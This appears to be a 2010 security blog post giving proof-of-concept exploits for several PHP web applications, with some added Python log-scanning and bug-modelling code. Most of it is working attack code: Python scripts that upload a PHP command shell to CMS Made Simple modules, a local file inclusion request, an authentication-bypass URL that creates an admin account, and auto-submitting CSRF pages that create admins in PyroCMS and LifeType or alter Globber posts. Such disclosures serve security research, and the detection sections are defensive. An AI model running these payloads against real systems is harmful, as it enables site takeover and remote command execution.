This site will soon be superseded by http://www.johnleitch.net

Sunday, July 11, 2010

CMS Made Simple 1.8 Download Manager 1.4.1 Module Arbitrary Upload

An arbitrary upload vulnerability in CMS Made Simple 1.8 Download Manager 1.4.1 Module can be exploited to upload a PHP shell.

PoC
import socket, re

host = 'localhost'
path = '/cmsms'
port = 80

def upload_shell():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)

    s.send('POST ' + path + '/modules/DownloadManager/lib/simple-upload/example.php HTTP/1.1\r\n'
           'Host: localhost\r\n'
           'Proxy-Connection: keep-alive\r\n'
           'User-Agent: x\r\n'
           'Content-Length: 189\r\n'
           'Cache-Control: max-age=0\r\n'
           'Origin: null\r\n'
           'Content-Type: multipart/form-data; boundary=----x\r\n'
           'Accept: text/html\r\n'
           'Accept-Encoding: gzip,deflate,sdch\r\n'
           'Accept-Language: en-US,en;q=0.8\r\n'
           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
           '\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="file"; filename="shell.php"\r\n'
           'Content-Type: application/octet-stream\r\n'
           '\r\n'
           '<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
           '------x--\r\n'
           '\r\n')

    resp = s.recv(8192)

    http_ok = 'HTTP/1.1 200 OK'

    if http_ok not in resp[:len(http_ok)]:
        print 'error uploading shell'
        return
    else: print 'shell uploaded'

    shell_path = path + '/modules/DownloadManager/lib/simple-upload/'\
        + re.search(u'shell_[^.]+\.php', resp).group(0)

    s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
           'Host: ' + host + '\r\n\r\n')

    if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'
    else: print 'shell located at http://' + host + shell_path

upload_shell()

CMS Made Simple 1.8 Antz Toolkit 1.02 Module Arbitrary Upload

An arbitrary upload vulnerability in CMS Made Simple 1.8 Antz Toolkit 1.02 Module can be exploited to upload a PHP shell.

PoC
import socket

host = 'localhost'
path = '/cmsms'
port = 80

def upload_shell():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)

    s.send('POST ' + path + '/include.php HTTP/1.1\r\n'
           'Host: localhost\r\n'
           'Proxy-Connection: keep-alive\r\n'
           'User-Agent: x\r\n'
           'Content-Length: 257\r\n'
           'Cache-Control: max-age=0\r\n'
           'Origin: null\r\n'
           'Content-Type: multipart/form-data; boundary=----x\r\n'
           'Accept: text/html\r\n'
           'Accept-Encoding: gzip,deflate,sdch\r\n'
           'Accept-Language: en-US,en;q=0.8\r\n'
           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
           '\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="antzSeed"\r\n'
           '\r\n'
           '\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="shell_file"; filename="shell.php"\r\n'
           'Content-Type: application/octet-stream\r\n'
           '\r\n'
           '<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
           '------x--\r\n'
           '\r\n')

    resp = s.recv(8192)

    s.close()

    http_ok = 'HTTP/1.1 200 OK'

    if http_ok not in resp[:len(http_ok)]:
        print 'error uploading shell'
        return
    else: print 'shell uploaded'

    print 'searching for shell'

    for i in range(0, 9999):

        shell_path = path + '/modules/antz/tmp/' + str(i) + 'shell.php'

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.settimeout(8)

        s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
               'Host: ' + host + '\r\n\r\n')

        if http_ok in s.recv(8192)[:len(http_ok)]:
            print '\r\nshell located at http://' + host + shell_path
            break
        else:
            print '.',

upload_shell()

CMS Made Simple 1.8 Local File Inclusion

A local file inclusion vulnerability in CMS Made Simple 1.8 can be exploited to include arbitrary files.

PoC
import httplib, urllib

host = 'localhost'
path = '/cmsms'

lfi = '../' * 32 + 'windows/win.ini\x00'

c = httplib.HTTPConnection(host)
c.request('POST', path + '/admin/addbookmark.php',
          urllib.urlencode({ 'default_cms_lang': lfi }),
          { 'Content-type': 'application/x-www-form-urlencoded' })
r = c.getresponse()

print r.status, r.reason
print r.read()
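The three CMS Made Simple issues above leave a recognisable trail in a web server's access log: a POST to one of the two upload scripts, a follow-up request for a .php file in the directory the upload landed in, and (if it travels in the URL) a language parameter full of ../ segments ending in %00. The following is an added Python 3 example, not code from the original post or from the CMS Made Simple project; the log lines are constructed, the endpoint and directory lists are taken from the PoCs, and the label names are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Jul/2010:10:00:01 +0000] "POST /cmsms/modules/DownloadManager/lib/simple-upload/example.php HTTP/1.1" 200 512 "-" "x"
10.0.0.5 - - [11/Jul/2010:10:00:02 +0000] "GET /cmsms/modules/DownloadManager/lib/simple-upload/shell_4f2a.php?CMD=id HTTP/1.1" 200 88 "-" "x"
10.0.0.7 - - [11/Jul/2010:10:01:00 +0000] "GET /cmsms/modules/antz/tmp/17shell.php HTTP/1.1" 404 210 "-" "x"
10.0.0.9 - - [11/Jul/2010:10:02:00 +0000] "GET /cmsms/admin/addbookmark.php?default_cms_lang=..%2F..%2Fwindows%2Fwin.ini%00 HTTP/1.1" 200 300 "-" "x"
10.0.0.2 - - [11/Jul/2010:10:03:00 +0000] "GET /cmsms/index.php?page=home HTTP/1.1" 200 4096 "-" "Mozilla"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

# Scripts the PoCs above POST their multipart uploads to.
UPLOAD_ENDPOINTS = ("/modules/DownloadManager/lib/simple-upload/example.php",
                    "/include.php")
# Directories the uploaded files land in; a .php request there is a dropped file being run.
DROP_DIRS = ("/modules/DownloadManager/lib/simple-upload/", "/modules/antz/tmp/")

def classify(method, url, status):
    """Return finding labels for one request; an empty list means nothing matched."""
    decoded = unquote(url)
    script = decoded.split("?", 1)[0]
    findings = []
    if method == "POST" and script.endswith(UPLOAD_ENDPOINTS):
        findings.append("post-to-upload-endpoint")
    elif (script.endswith(".php") and not script.endswith(UPLOAD_ENDPOINTS)
          and any(d in script for d in DROP_DIRS)):
        # 200 means the dropped file answered; anything else is a probe for it.
        findings.append("php-served-from-upload-dir" if status == "200"
                        else "probe-for-php-in-upload-dir")
    # LFI shape from the addbookmark PoC. That PoC sends it in a POST body,
    # which plain access logs do not record; this only catches the URL form.
    if "../" in decoded or "\x00" in decoded:
        findings.append("traversal-or-null-byte-in-url")
    return findings

def scan(log_text):
    """Return (ip, method, script, findings) for every flagged request, in log order."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            findings = classify(m["method"], m["url"], m["status"])
            if findings:
                alerts.append((m["ip"], m["method"], m["url"].split("?", 1)[0], findings))
    return alerts
```

A 200 for a .php file under either directory from the same address that just POSTed to the upload script is the strongest signal; repeated 404s under antz/tmp match the brute-force search the second PoC performs.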

Orbis 1.0.2 Authentication Bypass

An authentication bypass vulnerability in Orbis 1.0.2 can be exploited to create a new admin.

Exploit
Several admin-related scripts fail to terminate after setting the header location field.

PoC
http://localhost/orbis/admin/admin_users_create.php?nusern=new_admin&nuserp=Password1&nusert=2&nusere=@
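The bug class is a redirect that is issued but not followed by a stop: the anonymous caller's browser is sent to the login page, yet the code after the check still runs. The following is an added Python 3 model of that control flow, not Orbis code; the handler names and the dictionary-based session and user store are my own stand-ins, and the parameter names come from the PoC URL above.

```python
# Constructed model of the flaw described above, not Orbis code: an admin
# script sets a Location header for callers who are not logged in but keeps
# executing, so the privileged action below the check still happens. The
# browser only ever sees the redirect, which is why click-testing misses it.

def create_user_vulnerable(session, params, users):
    """Sets Location for anonymous callers but falls through (PHP header() with no exit())."""
    headers = {}
    if not session.get("logged_in"):
        headers["Location"] = "login.php"
        # no return here: execution continues into the privileged code
    users[params["nusern"]] = {"password": params["nuserp"], "type": int(params["nusert"])}
    return headers, users

def create_user_fixed(session, params, users):
    """Returns right after setting Location, the equivalent of header(); exit;."""
    if not session.get("logged_in"):
        return {"Location": "login.php"}, users
    users[params["nusern"]] = {"password": params["nuserp"], "type": int(params["nusert"])}
    return {}, users

def run(handler):
    """Drive a handler with an empty (anonymous) session and the PoC's parameters."""
    params = {"nusern": "new_admin", "nuserp": "Password1", "nusert": "2", "nusere": "@"}
    headers, users = handler({}, params, {})
    # What the browser sees, and what actually happened server-side.
    return headers.get("Location"), sorted(users)
```

Both handlers answer an anonymous request with the same redirect; only the vulnerable one leaves a new account behind, which is exactly the difference a log review of the admin scripts should be looking for.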

PyroCMS 0.9.9.1 Cross-site Request Forgery

A cross-site request forgery vulnerability in PyroCMS 0.9.9.1 can be exploited to create a new admin.

PoC
<html>
<body onload="document.forms[0].submit()">
    <form method="POST" action="http://localhost/pyrocms/index.php/admin/users/create">
        <input type="hidden" name="first_name" value="a" />
        <input type="hidden" name="last_name" value="a" />
        <input type="hidden" name="email" value="new_admin@x.com" />
        <input type="hidden" name="username" value="new_admin" />
        <input type="hidden" name="display_name" value="a" />
        <input type="hidden" name="group" value="admin" />
        <input type="hidden" name="active" value="1" />
        <input type="hidden" name="password" value="Password1" />
        <input type="hidden" name="confirm_password" value="Password1" />
        <input type="hidden" name="btnAction" value="save" />
    </form>
</body>
</html>

LifeType 1.2.10 Cross-site Request Forgery

A cross-site request forgery vulnerability in LifeType 1.2.10 can be exploited to create a new admin.

PoC
<html>
<body>
    <img src="http://localhost/lifetype-1.2.10/admin.php?userName=newadmin&userFullName=&newUserPassword=Password1&userEmail=a%40a.com&userStatus=1&blogId=1&blogName=asdfasdfs&userPermissions%5B49%5D=49&userPermissions%5B58%5D=58&userPermissions%5B52%5D=52&userPermissions%5B43%5D=43&userPermissions%5B46%5D=46&userPermissions%5B55%5D=55&userPermissions%5B39%5D=39&userPermissions%5B41%5D=41&userPermissions%5B1%5D=1&userPermissions%5B66%5D=66&userPermissions%5B65%5D=65&userPermissions%5B51%5D=51&userPermissions%5B60%5D=60&userPermissions%5B62%5D=62&userPermissions%5B54%5D=54&userPermissions%5B45%5D=45&userPermissions%5B64%5D=64&userPermissions%5B48%5D=48&userPermissions%5B57%5D=57&userPermissions%5B42%5D=42&userPermissions%5B50%5D=50&userPermissions%5B59%5D=59&userPermissions%5B61%5D=61&userPermissions%5B53%5D=53&userPermissions%5B44%5D=44&userPermissions%5B63%5D=63&userPermissions%5B47%5D=47&userPermissions%5B56%5D=56&userPermissions%5B40%5D=40&Add+User=Add&op=addUser" />
</body>
</html>

Globber 1.4 Cross-site Request Forgery

A cross-site request forgery vulnerability in Globber can be exploited to add and delete blog posts.

PoC
<!-- Add (note that the blog also must be "rebuilt") -->
<html>
<body onload="document.forms[0].submit()">
    <form method="POST" action="http://localhost/globber/admin.php?task=edit&c=Misc&a=new-article">
        <input type="hidden" name="title" value="New Article" />
        <input type="hidden" name="date" value="06-07-2010 10:16 pm" />
        <input type="hidden" name="tags" value="" />
        <input type="hidden" name="content" value="&lt;script&gt;alert(0)&lt;/script&gt;" />
    </form>
</body>
</html>

<!-- Delete -->
<html>
<body>
    <img src="http://localhost/globber/admin.php?task=articles&delc=Misc&dela=first-post" />
</body>
</html>